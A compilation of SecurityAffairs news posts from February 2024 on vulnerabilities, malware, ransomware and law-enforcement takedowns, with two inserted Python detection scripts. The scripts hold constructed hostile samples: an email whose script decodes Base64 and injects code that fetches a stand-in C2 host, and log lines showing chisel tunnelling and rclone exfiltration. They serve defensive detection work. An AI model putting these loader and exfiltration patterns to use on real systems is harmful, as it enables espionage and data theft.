Vulnerabilities in security solutions are particularly dangerous because they are difficult to detect and because such software runs with high privileges.

In December 2023, the cybersecurity firm addressed a vulnerability (CVE-2023-5594, CVSS score 7.5) in the Secure Traffic Scanning Feature, preventing potential exploitation that could lead web browsers to trust websites using certificates signed with outdated and insecure algorithms.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, privilege escalation)

SolarWinds addressed critical RCEs in Access Rights Manager (ARM)

19 February 2024 at 07:48

SolarWinds addressed three critical vulnerabilities in its Access Rights Manager (ARM) solution, including two RCE bugs.

SolarWinds has fixed several Remote Code Execution (RCE) vulnerabilities in its Access Rights Manager (ARM) solution.

Access Rights Manager (ARM) is a software solution designed to assist organizations in managing and monitoring access rights and permissions within their IT infrastructure. This type of tool is crucial for maintaining security, compliance, and efficient administration of user access to various resources, systems, and data.

Below is the list of flaws addressed by the company:

ADVISORY | CVE ID | SEVERITY | RELEASE DATE | LAST UPDATE | FIXED VERSION
SolarWinds Access Rights Manager (ARM) Deserialization of Untrusted Data Remote Code Execution Vulnerability | CVE-2023-40057 | 9.0 Critical | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SolarWinds Access Rights Manager (ARM) Directory Traversal Remote Code Execution Vulnerability | CVE-2024-23476 | 9.6 Critical | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SolarWinds Access Rights Manager (ARM) Traversal Remote Code Execution Vulnerability | CVE-2024-23477 | 7.9 High | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SolarWinds Access Rights Manager (ARM) Deserialization of Untrusted Data Remote Code Execution Vulnerability | CVE-2024-23478 | 8.0 High | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SolarWinds Access Rights Manager (ARM) Traversal Remote Code Execution Vulnerability | CVE-2024-23479 | 9.6 Critical | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SQL Injection Remote Code Execution Vulnerability | CVE-2023-50395 | 8.0 High | 02/06/2024 | 02/06/2024 | SolarWinds Platform 2024.1
SQL Injection Remote Code Execution Vulnerability | CVE-2023-35188 | 8.0 High | 02/06/2024 | 02/06/2024 | SolarWinds Platform 2024.1

The three critical remote code execution flaws are:

  • CVE-2023-40057 (CVSS score 9.0): A deserialization of untrusted data issue. An authenticated user can exploit this vulnerability to abuse a SolarWinds service, resulting in remote code execution.
  • CVE-2024-23479 (CVSS score 9.6): A Directory Traversal Remote Code Execution Vulnerability. An unauthenticated user can exploit this issue to achieve remote code execution.
  • CVE-2024-23476 (CVSS score 9.6): A Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve remote code execution.

The company fixed the flaws with the release of Access Rights Manager 2023.2.3.

SolarWinds made the headlines in 2020, when a Russia-linked APT group carried out a supply chain attack that compromised the Orion software provided by the company.

In a filing with the US SEC, the company revealed that 18,000 customers might have been impacted by the cyber attack against its supply chain.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, SolarWinds)

How BRICS Got “Rug Pulled” – Cryptocurrency Counterfeiting is on the Rise

19 February 2024 at 11:39

Resecurity has identified an increasing trend of cryptocurrency counterfeiting: the experts found several tokens impersonating major brands, government organizations and national fiat currencies.

Resecurity has identified an increasing trend of cryptocurrency counterfeiting. Ongoing brand protection work for Fortune 100 companies by the cybersecurity company uncovered several tokens impersonating major brands, government organizations and even national fiat currencies.

As in any other booming industry, the decentralized finance (DeFi) and crypto space has attracted its fair share of scammers and bad actors. These individuals seek to lure investors into fake projects known as rug pulls, only to abscond with their funds.

A notable example of this deceptive practice is the emergence of a counterfeit token named ‘BRICS’ recently detected by Resecurity, which exploited the focus on the investment interest and potential expansion of the BRICS intergovernmental organization, comprising countries like Brazil, Russia, India, China, South Africa, Egypt, Ethiopia, Iran, and the United Arab Emirates. 

Besides the scam itself, the bad actors also spread misinformation about new countries joining the alliance, countries that had not confirmed their membership. This is a clear example of how bad actors capitalize on geopolitical narratives to profit from investment scams. Unverified news claiming that BRICS countries were adopting gold-backed money to compete with the US dollar and the euro likely inspired the idea, which later turned into a creative crypto scam.

cryptocurrency counterfeiting 1

Leveraging the organization’s international profile, the fraudsters launched an initial coin offering (ICO) promoting the fake token and offering various rewards.

cryptocurrency counterfeiting 2

This type of fraud was prominently observed on platforms such as Lobstr.co, which allows the creation of tokens on the Stellar network. Due to their flexibility in allowing users to offer their own tokens for trading, such platforms are especially susceptible to exploitation by cybercriminals.

cryptocurrency counterfeiting 3

The common fraudulent tactics they employ include ‘cryptocurrency counterfeiting’, where scammers create tokens with names like those of legitimate ones, and the aforementioned ‘rug pulls’.

As of today, the token is still available for trading and is attracting victims:

https://stellar.expert/explorer/public/asset/BRICS-GBC7NIEHS6Q4EKHQAB7GPPNUPVVXX43D4VPWNO44X5YTLN4WKZZ53SAR

cryptocurrency counterfeiting 4

The offer has already generated some interest and led to the first victims:

cryptocurrency counterfeiting 5

Resecurity warns Internet users to perform due diligence on new cryptocurrency offerings and to contact their local regulators to make sure the offerings are legitimate.

Resecurity has identified and reported similar counterfeit cryptocurrency tokens promoted on the same platform, impersonating:

  • one of the major oil corporations
  • national financial regulator
  • national currency
  • major real estate development

Some of these scams involved misleading information referencing the Monetary Authority of Singapore and the central bank of a Middle Eastern country.

According to Solidus Labs, ‘rug pull’ scams have defrauded over 2 million investors, surpassing the number of victims of major crypto failures such as FTX, Celsius, and Voyager.

These scams typically manifest in two forms:

  • DeFi scams involve altering a token’s smart contract to defraud investors. Tactics used include making the token unsellable, enabling the creation of an unlimited number of new tokens, or imposing high trading fees.
  • Exit scams are characterized by extensive promotion of a token, followed by the scammers betraying investors. Methods include creating fake marketing websites, announcing non-existent partnerships, or using bots for wash trading.

The low barrier to entry for executing these scams makes them accessible to a broad range of malicious actors, eliminating the need for advanced programming skills. Utilizing platforms like Stellar to create misleadingly named tokens is a common strategy in these ‘rug pulls’.

The cryptocurrency landscape faces significant challenges in combating such fraudulent activities, highlighting the urgent need for increased vigilance and more robust regulatory frameworks.

More details are included in the analysis published by Resecurity:

https://www.resecurity.com/blog/article/how-brics-got-rug-pulled-crypto-counterfeiting-is-on-the-rise

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, cryptocurrency counterfeiting)

Russia-linked APT TAG-70 targets European government and military mail servers exploiting Roundcube XSS

19 February 2024 at 13:58

An APT group, tracked as TAG-70, linked to Belarus and Russia exploited XSS flaws in Roundcube webmail servers to target over 80 organizations.

Researchers from Recorded Future’s Insikt Group identified a cyberespionage campaign carried out by an APT group, tracked as TAG-70, linked to Belarus and Russia. The nation-state actors are known to have carried out cyber-espionage against government, military, and national infrastructure entities in Europe and Central Asia since at least December 2020.

Between October and December 2023, TAG-70 exploited cross-site scripting (XSS) vulnerabilities in Roundcube webmail servers in attacks aimed at over 80 organizations, primarily in Georgia, Poland, and Ukraine.

“TAG70 has demonstrated a high level of sophistication in its attack methods. The threat actors leveraged social engineering techniques and exploited cross-site scripting vulnerabilities in Roundcube webmail servers to gain unauthorized access to targeted mail servers, successfully bypassing the defenses of government and military organizations.” reads the report published by Recorded Future’s Insikt Group.

TAG-70 Roundcube Russia

The researchers noticed similarities between this campaign and other activities conducted by other Russia-linked groups, such as BlueDelta (APT28) and Sandworm. These APT groups previously targeted email solutions, including Roundcube and Zimbra.

The compromise of email servers poses a substantial risk, especially during a conflict such as Russia-Ukraine. Threat actors can target email servers to gather intelligence about adversaries’ war efforts, diplomatic relationships, and coalition partnerships.

The attacks aimed at Iranian embassies in Russia and the Netherlands demonstrate a broader geopolitical interest in assessing Iran’s diplomatic activities, particularly its support for Russia in the context of the Ukrainian conflict. Similarly, the espionage against Georgian government entities reflects an interest in monitoring Georgia’s pursuits to access the European Union (EU) and NATO.

On July 27, 2023, the researchers identified a malicious JavaScript that acted as a second-stage loader used by TAG-70 prior to the exploitation of the Roundcube issue. ESET researchers also detailed the same attack chain.

The JavaScript is loaded through cross-site scripting (XSS) from a malicious email; it decodes a Base64-encoded JavaScript payload (jsBodyBase64), and the decoded payload is then inserted into the Document Object Model (DOM) of the Roundcube webpage inside a newly created script tag.
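A heuristic check, added here as an example and not taken from the Recorded Future or ESET reports, that scans an HTML e-mail body for the decode-then-inject loader pattern described above (a Base64 blob decoded with atob and dropped into the DOM as a new script element). The message samples and the example.invalid host are constructed.

```python
"""Heuristic scan of an HTML e-mail body for an inline loader that decodes a
Base64 payload and injects it into the DOM as a new <script> element.
All sample messages below are constructed for this example."""
import base64
import binascii
import re
from html.parser import HTMLParser

# Indicators of the decode-then-inject pattern. These are generic browser APIs,
# not identifiers taken from the TAG-70 samples.
DECODE_RE = re.compile(r"\batob\s*\(", re.I)
INJECT_RE = re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)", re.I)
# A quoted run of 40+ Base64 characters, long enough to carry real code.
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")


class ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and on* event-handler attribute values."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.snippets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.in_script = True
        for name, value in attrs:
            if name.lower().startswith("on") and value:
                self.snippets.append(value)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and data.strip():
            self.snippets.append(data)


def decoded_payload_looks_like_script(snippet):
    """Decode every long Base64 literal in the snippet and look for JavaScript inside."""
    for literal in B64_LITERAL_RE.findall(snippet):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
        if re.search(r"\b(document|window|fetch|XMLHttpRequest)\b", text):
            return True
    return False


def scan_email_html(html):
    """Return the reasons the body matches the loader pattern (empty list if clean)."""
    collector = ScriptCollector()
    collector.feed(html)
    reasons = []
    for snippet in collector.snippets:
        if DECODE_RE.search(snippet) and INJECT_RE.search(snippet):
            reasons.append("inline script decodes Base64 and injects a <script> element")
        if decoded_payload_looks_like_script(snippet):
            reasons.append("embedded Base64 literal decodes to JavaScript")
    return reasons


# Constructed samples: a plain newsletter and a message carrying the loader pattern.
CLEAN_EMAIL = "<html><body><p>Quarterly report attached.</p></body></html>"
STAGE2 = base64.b64encode(b"document.title='x'; fetch('https://example.invalid/c2');").decode()
SUSPICIOUS_EMAIL = (
    "<html><body><p>Please review.</p><script>"
    "var jsBodyBase64='" + STAGE2 + "';"
    "var s=document.createElement('script');"
    "s.text=atob(jsBodyBase64);document.body.appendChild(s);"
    "</script></body></html>"
)

if __name__ == "__main__":
    for label, body in (("clean", CLEAN_EMAIL), ("suspicious", SUSPICIOUS_EMAIL)):
        print(label, scan_email_html(body))
```

Such a check belongs in the mail gateway or in a scan of stored mailboxes; it complements, rather than replaces, patching the webmail server itself.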

TAG-70 Roundcube Russia

The researchers recommend reading the detailed analysis of the recent TAG-70 campaign here.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Roundcube)

A Ukrainian Raccoon Infostealer operator is awaiting trial in the US

19 February 2024 at 15:01

The Raccoon Infostealer operator, Mark Sokolovsky, was extradited to the US from the Netherlands to appear in a US court.

In October 2020, the US Justice Department charged a Ukrainian national, Mark Sokolovsky (28), with computer fraud for allegedly infecting millions of computers with the Raccoon Infostealer.

The man was held in the Netherlands, where he was charged for his alleged role in the international cybercrime operation known as Raccoon Infostealer. He appealed the decision of a Dutch court granting his extradition to the United States, but he was eventually extradited from the Netherlands to appear in a US court.

The Raccoon stealer was first spotted in April 2019. It was designed to steal victims’ credit card data, email credentials, cryptocurrency wallets, and other sensitive data.

Raccoon is offered for sale as malware-as-a-service (MaaS) with an easy-to-use automated backend panel; the operators also offer bulletproof hosting and 24/7 customer support in both Russian and English. The Raccoon service costs $200 per month.

The Raccoon stealer is written in C++ by Russian-speaking developers who initially promoted it exclusively on Russian-speaking hacking forums. The malware is now promoted on English-speaking hacking forums as well, and it works on both 32-bit and 64-bit operating systems.

Raccoon Infostealer

The analysis of the logs for sale in the underground community allowed the experts to estimate that Raccoon infected over 100,000 users worldwide at the time of its discovery.

The list of targeted applications includes cryptocurrency apps for major currencies (Electrum, Ethereum, Exodus, Jaxx, and Monero), popular browsers (Google Chrome, Mozilla Firefox, Microsoft Edge, Internet Explorer, Opera, Vivaldi, Waterfox, SeaMonkey, UC Browser) and email clients such as Thunderbird, Outlook, and Foxmail.

Dutch authorities arrested Sokolovsky in March 2022. Concurrently with his arrest, the FBI and law enforcement partners in Italy and the Netherlands dismantled the C2 infrastructure used by the Raccoon Infostealer operation.

The FBI identified more than 50 million unique credentials and forms of identification (email addresses, bank accounts, cryptocurrency addresses, credit card numbers, etc.) in the stolen data. While the exact number of victims has yet to be verified, experts believe that millions of potential victims around the world were targeted by the operation.

The credentials appear to include over four million email addresses. The United States does not believe it is in possession of all the data stolen by Raccoon Infostealer and continues to investigate.

Sokolovsky is charged with computer fraud, wire fraud, money laundering and aggravated identity theft.

Sokolovsky faces a maximum penalty of 20 years in prison for the wire fraud and money laundering offenses, five years for the conspiracy to commit computer fraud charge, and a mandatory consecutive two-year term for the aggravated identity theft offense.

He appeared in a US court on February 9 and is currently awaiting trial.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Raccoon Infostealer)

Anatsa Android banking Trojan expands to Slovakia, Slovenia, and Czechia

19 February 2024 at 19:16

The Android banking trojan Anatsa has resurged, expanding its operation to new countries, including Slovakia, Slovenia, and Czechia.

In November 2023, researchers from ThreatFabric observed a resurgence of the Anatsa banking Trojan, aka TeaBot and Toddler. Between November and February, the experts observed five distinct waves of attacks, each focusing on different regions.

The malware previously focused its activities on the UK, Germany, and Spain, but the latest campaigns targeted Slovakia, Slovenia, and Czechia, which suggests a shift in its operational strategy.

The researchers classified Anatsa’s activity as “targeted,” with the threat actors observed focusing on 3-5 regions at a time. According to ThreatFabric, the dropper applications were uploaded to Google Play in the targeted regions. The researchers noticed that the applications often reached the Top-3 in the “Top New Free” category, which tricks users into believing that the application is legitimate and has been downloaded by a large number of users.

Anatsa

“Throughout this campaign, Anatsa’s Modus Operandi has evolved, displaying more sophisticated tactics such as AccessibilityService abuse, a multi-staged infection process, and the ability to bypass Android 13’s restricted settings.” reads the report published by ThreatFabric.

The researchers pointed out that some of the droppers successfully exploited the accessibility service and bypassed Google Play’s enhanced detection and protection mechanisms.

To avoid detection, the droppers adopted a multi-staged methodology, dynamically retrieving configuration and malicious executable files from their C2 server.

“All droppers in this campaign have demonstrated the capability to bypass the restricted settings for accessibility service in Android 13.” continues the report.

The experts observed five droppers in the latest campaign with over 100,000 total installations.  

Anatsa was first detected by the Italian cybersecurity firm Cleafy in March 2021 while it was targeting banks in Spain, Germany, Italy, Belgium, and the Netherlands.

TeaBot supports the common features of Android banking Trojans and, like similar malware families, abuses Accessibility Services. Below is a list of features implemented by the malware:

  • Ability to perform overlay attacks against multiple bank applications to steal login credentials and credit card information
  • Ability to send / intercept / hide SMS messages
  • Keylogging functionality
  • Ability to steal Google Authenticator codes
  • Ability to obtain full remote control of an Android device (via Accessibility Services and real-time screen sharing)

The Anatsa banking Trojan allows operators to take over the infected devices and execute actions on a victim’s behalf.

“Effective detection and monitoring of malicious applications, along with observing unusual customer account behaviour, are crucial for identifying and investigating potential fraud cases linked to device-takeover mobile malware like Anatsa.” concludes the report.

Below is a statement sent by a Google spokesperson to Security Affairs:

“All of the apps identified in the report have been removed from Google Play. Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services. Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Android banking malware)

Operation Cronos: law enforcement disrupted the LockBit operation

19 February 2024 at 23:14

An international law enforcement operation codenamed ‘Operation Cronos’ led to the disruption of the LockBit ransomware operation.

A joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries has disrupted the LockBit ransomware operation.

Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).

“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.

“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”

Operation Cronos is still ongoing, and the NCA announced that more information will be published tomorrow, February 20, 2024.

LockBit ransomware

vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.

Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd

— vx-underground (@vxunderground) February 19, 2024

LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.

According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric

20 February 2024 at 07:01

The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric.

The Cactus ransomware group claims responsibility for pilfering 1.5TB of data from the Energy management and industrial automation giant Schneider Electric.

Schneider Electric is a multinational company that specializes in energy management, industrial automation, and digital transformation.

In January, BleepingComputer first reported the attack that hit the Sustainability Business division of the company on January 17th. At the time, BleepingComputer contacted Schneider Electric which confirmed the data breach.

The attack impacted the services of Schneider Electric’s Resource Advisor cloud platform causing outages.

Schneider Electric said that other divisions of the company were not impacted by the cyber attack.

Today, the Cactus ransomware gang published 25MB of allegedly stolen data on its Tor leak site.

Schneider Electric Cactus ransomware

The gang also published several pictures of passports and company documents as proof of the hack.

Cactus Ransomware has just posted Schneider Electric. https://t.co/ZlVILOuNFr pic.twitter.com/z91nfnGYAQ

— Dominic Alvieri (@AlvieriD) February 19, 2024

The Cactus ransomware operation has been active since March 2023. Kroll researchers reported that the ransomware strain is notable for its use of encryption to protect the ransomware binary.

Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to look for other targets on the network along with PowerShell commands to enumerate endpoints. The ransomware identifies user accounts by viewing successful logins in Windows Event Viewer, it also uses a modified variant of the open-source PSnmap Tool.

The Cactus ransomware relies on multiple legitimate tools (e.g. Splashtop, AnyDesk, SuperOps RMM) to achieve remote access and uses Cobalt Strike and the proxy tool Chisel in post-exploitation activities.

Once the malware has escalated the privileges on a machine, the threat actors use a batch script to uninstall popular antivirus solutions installed on the machine.

Cactus uses the Rclone tool for data exfiltration and a PowerShell script called TotalExec, previously used by BlackBasta ransomware operators, to automate the deployment of the encryption process.
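A stage-aware detection over process-creation events for the Cactus tool chain described above (netscan, PSnmap, AnyDesk/Splashtop/SuperOps, Chisel, Rclone, TotalExec), added here as an example and not taken from Kroll’s or any vendor’s detection content. The log format and every sample line are constructed; the executable names are the tools’ usual file names and the batch-script name is assumed, not taken from the article.

```python
"""Correlate process-creation events per host and flag hosts where several
distinct stages of the Cactus tool chain appear. Log format and sample lines
are constructed; binary names are assumed, not taken from the article."""
import re
from collections import defaultdict

# Each rule: case-insensitive regex over the command line -> attack stage.
RULES = [
    (re.compile(r"\bnetscan(?:\.exe)?\b|\bpsnmap\b", re.I), "discovery"),
    (re.compile(r"\b(anydesk|splashtop|superops)\b", re.I), "remote-access"),
    (re.compile(r"\bchisel(?:\.exe)?\b", re.I), "tunnelling"),
    (re.compile(r"\brclone(?:\.exe)?\b", re.I), "exfiltration"),
    (re.compile(r"\btotalexec\b", re.I), "encryption-deployment"),
    # Batch script named for AV removal: file name is an assumption for the sample.
    (re.compile(r"\w*uninstall\w*\.bat\b", re.I), "defence-evasion"),
]

# Constructed record layout: "<timestamp> host=<name> user=<name> cmd=<command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")


def parse_line(line):
    """Parse one constructed process-creation record; return None if malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(cmd):
    """Return the set of stages a command line matches (empty for benign commands)."""
    return {stage for rx, stage in RULES if rx.search(cmd)}


def correlate(lines, min_stages=2):
    """Group matches by host; flag hosts showing at least min_stages distinct stages.

    A single match (an admin legitimately running AnyDesk) is noisy on its own;
    discovery plus exfiltration plus mass deployment on one host is not.
    """
    stages_by_host = defaultdict(set)
    evidence = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hit = classify(rec["cmd"])
        if hit:
            stages_by_host[rec["host"]] |= hit
            evidence[rec["host"]].append((rec["ts"], sorted(hit), rec["cmd"]))
    return {
        host: {"stages": sorted(stages), "events": evidence[host]}
        for host, stages in stages_by_host.items()
        if len(stages) >= min_stages
    }


# Constructed sample events: FS01 shows the full chain, WS22 only a single
# remote-support session, WS23 is benign, and the last line is malformed.
SAMPLE_LOG = """\
2024-02-19T08:01:10Z host=FS01 user=CORP\\svc_backup cmd=C:\\Temp\\netscan.exe
2024-02-19T08:05:42Z host=FS01 user=CORP\\svc_backup cmd=powershell.exe -File C:\\Temp\\PSnmap.ps1
2024-02-19T08:20:03Z host=FS01 user=CORP\\svc_backup cmd=C:\\Temp\\chisel.exe client 203.0.113.10:443
2024-02-19T09:12:55Z host=FS01 user=CORP\\svc_backup cmd=C:\\Temp\\rclone.exe copy D:\\Shares remote:drop
2024-02-19T10:30:17Z host=FS01 user=CORP\\svc_backup cmd=cmd.exe /c C:\\Temp\\av_uninstall.bat
2024-02-19T10:45:00Z host=FS01 user=CORP\\svc_backup cmd=powershell.exe -File C:\\Temp\\TotalExec.ps1
2024-02-19T11:00:00Z host=WS22 user=CORP\\jdoe cmd=C:\\Program Files\\AnyDesk\\AnyDesk.exe
2024-02-19T11:02:31Z host=WS23 user=CORP\\asmith cmd=C:\\Windows\\System32\\notepad.exe C:\\notes.txt
not a valid record
"""
SAMPLE_LINES = SAMPLE_LOG.splitlines()

if __name__ == "__main__":
    for host, info in correlate(SAMPLE_LINES).items():
        print(host, info["stages"])
        for ts, stages, cmd in info["events"]:
            print("  ", ts, stages, cmd)
```

In production the rules would run over Sysmon event ID 1 or EDR process telemetry rather than a constructed text log, and the stage threshold would be tuned to the environment’s legitimate use of remote-support and sync tools.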

In early January, the Cactus ransomware group claimed to have hacked Coop, one of the largest retail and grocery providers in Sweden.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

More details about Operation Cronos that disrupted Lockbit operation

20 February 2024 at 16:11

Law enforcement provided additional details about the international Operation Cronos that led to the disruption of the Lockbit ransomware operation.

Yesterday, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation.

Below is the image of the Tor leak site of the Lockbit ransomware gang that was seized by the UK National Crime Agency (NCA).

LockBit ransomware

“The site is now under the control of law enforcement. This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” reads the banner.

“We can confirm that Lockbit’s services have been disrupted as a result of International Law Enforcement action – this is an ongoing and developing operation. Return here for more information at: 11:30 GMT on Tuesday 20th Feb”

Operation Cronos is still ongoing, and the NCA announced that more information has yet to be shared.

vx-underground researchers contacted the administrators of the gang who confirmed that their infrastructure was seized by the FBI.

Lockbit ransomware group administrative staff has confirmed with us their websites have been seized. pic.twitter.com/SvpbeslrCd

— vx-underground (@vxunderground) February 19, 2024

The operation led to the arrest of two members of the ransomware gang in Poland and Ukraine and the seizure of hundreds of crypto wallets used by the group.

The British NCA took control of LockBit’s central administration environment used by the RaaS affiliates to carry out the cyberattacks. The authorities also seized the dark web Tor leak site used by the group.

The Tor leak site was seized by the NCA and is now used to publish updates on the law enforcement operation and provide support to the victims of the gang.

Lockbit

The NCA also obtained the source code of the LockBit platform and a huge trove of information on the group’s operation, including information on affiliates and supporters.

Law enforcement also had access to data stolen from the victims of the ransomware operation, a circumstance that highlights the fact that even when a ransom is paid, the ransomware gang often fails to delete the stolen information.

“LockBit had a bespoke data exfiltration tool, known as Stealbit, which was used by affiliates to steal victim data. Over the last 12 hours this infrastructure, based in three countries, has been seized by members of the Op Cronos taskforce, and 28 servers belonging to LockBit affiliates have also been taken down.” reads the NCA’s announcement. “The technical infiltration and disruption is only the beginning of a series of actions against LockBit and their affiliates. In wider action coordinated by Europol, two LockBit actors have been arrested this morning in Poland and Ukraine, over 200 cryptocurrency accounts linked to the group have been frozen.”

The US Department of Justice has charged two individuals for orchestrating ransomware attacks using the LockBit ransomware, they are currently in custody and will undergo trial in the US.

“The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries. Today, additional criminal charges against Kondratyev were unsealed in the Northern District of California related to his deployment in 2020 of ransomware against a victim located in California.” reads the press release published by DoJ. 

“Finally, the Department also unsealed two search warrants issued in the District of New Jersey that authorized the FBI to disrupt multiple U.S.-based servers used by LockBit members in connection with the LockBit disruption.”

Additionally, the US authorities have unveiled indictments against two Russian nationals, accusing them of conspiring to carry out LockBit attacks.

The NCA and its global partners have secured over 1,000 decryption keys that will allow victims of the gang to recover their files for free. The NCA will reach out to victims based in the UK in the coming days and weeks, providing support to help them recover encrypted data.

“This NCA-led investigation is a ground-breaking disruption of the world’s most harmful cyber crime group. It shows that no criminal operation, wherever they are, and no matter how advanced, is beyond the reach of the Agency and our partners.” said National Crime Agency Director General, Graeme Biggar.

“Through our close collaboration, we have hacked the hackers; taken control of their infrastructure, seized their source code, and obtained keys that will help victims decrypt their systems.”

“As of today, LockBit are locked out. We have damaged the capability and most notably, the credibility of a group that depended on secrecy and anonymity.

“Our work does not stop here. LockBit may seek to rebuild their criminal enterprise. However, we know who they are, and how they operate. We are tenacious and we will not stop in our efforts to target this group and anyone associated with them.”

The free decryptor for the Lockbit ransomware can be downloaded from the website of the ‘No More Ransom’ initiative. It’s unclear which version of the ransomware is targeted by the decryptor.

LockBit is a prominent ransomware operation that first emerged in September 2019. In 2022, LockBit was one of the most active ransomware groups, and its prevalence continued into 2023. Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. The LockBit ransomware operation operated under a Ransomware-as-a-Service (RaaS) model, recruiting affiliates to carry out ransomware attacks through the utilization of LockBit ransomware tools and infrastructure.

According to a joint report published by US authorities and international peers, the total of U.S. ransoms paid to LockBit is approximately $91M since LockBit activity was first observed in the U.S. on January 5, 2020.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

ConnectWise fixed critical flaws in ScreenConnect remote access tool

20 February 2024 at 21:06

ConnectWise addressed two critical vulnerabilities in its ScreenConnect remote desktop access product and urges customers to install the patches asap.

ConnectWise warns of the following two critical vulnerabilities in its ScreenConnect remote desktop access product:

  • CWE-288 Authentication bypass using an alternate path or channel (CVSS score 10)
  • CWE-22 Improper limitation of a pathname to a restricted directory (“path traversal”) (CVSS score 8.4)

Both vulnerabilities were reported on February 13, 2024, through the company’s vulnerability disclosure channel via the ConnectWise Trust Center. The company is not aware of attacks in the wild exploiting these vulnerabilities; however, due to the high risk of being targeted by exploits, ConnectWise recommends installing the updates as emergency changes within days.

The issues impact ScreenConnect 23.9.7 and prior. Below is the remediation provided in the advisory:

Cloud

No action is needed by the partner: ScreenConnect servers hosted in the “screenconnect.com” cloud or “hostedrmm.com” have been updated to remediate the issue.

On-premise

Partners that are self-hosted or on-premise need to update their servers to version 23.9.8 immediately to apply the patch.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, ConnectWise ScreenConnect remote desktop access product)
